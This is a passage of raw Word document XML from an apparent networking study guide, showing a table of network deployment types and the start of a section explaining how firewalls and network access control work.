            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06189436" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>Firewall/Security Appliance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="668" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77FA8E44" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>Corporate Networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="926" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6230BED0" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>Security-focused deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1132" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03151200" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>Cisco ASA, Fortinet FortiGate, pfSense</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="823" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A6034B5" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>• Integrated security</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• Policy enforcement</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• Traffic inspection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="751" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37D2F220" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>• Resource sharing</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• Performance impact</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• Feature limitations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F6497A" w:rsidRPr="00F6497A" w14:paraId="7DB2B503" w14:textId="77777777" w:rsidTr="00F6497A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F358F8F" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>Cloud/Virtual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="668" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34D12390" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>Cloud Networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="926" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="564E1125" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>Scalable deployments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1132" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BF49D60" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>AWS VPC, Azure Virtual Networks, VMware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="823" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="424612B0" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>• Auto-scaling</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• High availability</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• Managed service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="751" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1547C73A" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>• Cloud dependency</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• Limited control</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• Potential latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F6497A" w:rsidRPr="00F6497A" w14:paraId="2FA35A42" w14:textId="77777777" w:rsidTr="00F6497A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BD73617" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>Wireless Access Point</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="668" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A42EFE4" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>Small Networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="926" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14F9C803" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>Standalone wireless</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1132" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D7AC7D2" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>Ubiquiti UniFi, Cisco wireless APs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="823" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A50ADFC" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>• Simple deployment</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• Wireless integration</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• Low cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="751" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="042F8F91" w14:textId="77777777" w:rsidR="00F6497A" w:rsidRPr="00F6497A" w:rsidRDefault="00F6497A" w:rsidP="00F6497A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00F6497A">
              <w:t>• Limited scope</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• Basic functionality</w:t>
            </w:r>
            <w:r w:rsidRPr="00F6497A">
              <w:br/>
              <w:t>• No wired support</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CC0FF93" w14:textId="77777777" w:rsidR="00B24A30" w:rsidRPr="00B24A30" w:rsidRDefault="00B24A30" w:rsidP="00B24A30"/>
    <w:p w14:paraId="15A4BC20" w14:textId="77777777" w:rsidR="00953178" w:rsidRDefault="00953178">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial Black" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B7EB75" w14:textId="77777777" w:rsidR="00B70163" w:rsidRDefault="00B70163" w:rsidP="00B70163">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Network Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3C3CBA" w14:textId="77777777" w:rsidR="00EC1145" w:rsidRPr="00EC1145" w:rsidRDefault="00EC1145" w:rsidP="00EC1145">
      <w:r w:rsidRPr="00EC1145">
        <w:t>Network security protects data, devices, and resources from unauthorized access, misuse, or attacks. It uses multiple layers and technologies to defend against threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFB17CA" w14:textId="11BBA8DD" w:rsidR="00662873" w:rsidRPr="00662873" w:rsidRDefault="00662873" w:rsidP="00662873">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00662873">
        <w:t>Firewalls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CC91D4" w14:textId="097D747B" w:rsidR="00662873" w:rsidRPr="00662873" w:rsidRDefault="00662873" w:rsidP="00662873">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200325CB" w14:textId="70FE8592" w:rsidR="00662873" w:rsidRDefault="00662873" w:rsidP="00662873">
      <w:r w:rsidRPr="00662873">
        <w:t xml:space="preserve">Firewalls are network security devices that </w:t>
      </w:r>
      <w:r w:rsidRPr="00662873">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>control incoming and outgoing network traffic based on predetermined security rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00662873">
        <w:t>. They act as a barrier between trusted internal networks and untrusted external networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7958E9C9" w14:textId="323F3F3E" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="0083048F">
        <w:t xml:space="preserve">How </w:t>
      </w:r>
      <w:r>
        <w:t>It</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t xml:space="preserve"> Work</w:t>
      </w:r>
      <w:r w:rsidR="0049799C">
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630DBCE1" w14:textId="77777777" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:r w:rsidRPr="0083048F">
        <w:t>Firewalls operate by examining network packets and comparing them against a set of predefined rules or policies. The process involves several key steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2113DD21" w14:textId="7E107E66" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Packet </w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>inspection</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t>: Firewalls intercept all network traffic attempting to pass through them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12170937" w14:textId="71FB6856" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Rule </w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>matching</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t>: Each packet is compared against the firewall's rule set in order of priority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C94EBC" w14:textId="4EFDB015" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Decision </w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>making</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t>: Based on the rule match, the firewall decides to ALLOW, DENY, or DROP the packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDE4E45" w14:textId="77777777" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t>: Actions are typically logged for security monitoring and compliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546DB450" w14:textId="5B806115" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">State </w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tracking</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t>: Modern firewalls maintain connection state tables to track ongoing sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAB35A9" w14:textId="4A5907A7" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>omponents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36364AA5" w14:textId="695DAEDA" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="411"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Rule </w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t>: Collection of security policies defining allowed/denied traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDA62E6" w14:textId="72F452F4" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="411"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Network </w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t>: Physical or virtual connections to different network segments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6410EBEB" w14:textId="2900D5CD" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="411"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Processing </w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>engine</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t>: Core component that performs packet inspection and rule evaluation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78377274" w14:textId="2AAF3F2D" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="411"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Management </w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t>: Console for configuration and monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B23A5A0" w14:textId="77777777" w:rsidR="00662873" w:rsidRDefault="00662873" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00662873">
        <w:t>Network Access Control (NAC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DE4A27" w14:textId="24C2EEC5" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0195E1AA" w14:textId="77777777" w:rsidR="00662873" w:rsidRDefault="00662873" w:rsidP="00662873">
      <w:r w:rsidRPr="00662873">
        <w:t>NAC solutions ensure that only compliant and authorized devices can access network resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF0AEC3" w14:textId="342D7DA9" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="0083048F">
        <w:t xml:space="preserve">How </w:t>
      </w:r>
      <w:r>
        <w:t>It</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t xml:space="preserve"> Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6D61A0" w14:textId="1F19FAAD" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:r>
        <w:t>NAC</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t xml:space="preserve"> operates through a comprehensive policy enforcement framework:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454741D1" w14:textId="7AE1154B" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Device </w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t>: When a device attempts to connect to the network, NAC identifies the device type, OS, and installed software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B4D128" w14:textId="77777777" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t>: The system verifies the user's credentials and device identity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C8CA65" w14:textId="77777777" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authorization</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t>: Based on user role and device compliance, NAC determines access levels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A093685" w14:textId="01D39C1B" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Policy </w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>evaluation</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t>: The device is checked against security policies (antivirus status, patch level, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7D5E23" w14:textId="1789277F" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Network </w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>assignment</w:t>
      </w:r>
      <w:r w:rsidRPr="0083048F">
        <w:t>: Compliant devices get full access, while non-compliant devices are quarantined</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A914C0A" w14:textId="0EB925AE" w:rsidR="0083048F" w:rsidRPr="0083048F" w:rsidRDefault="0083048F" w:rsidP="0083048F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0083048F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Continuous </w:t>
      </w:r>
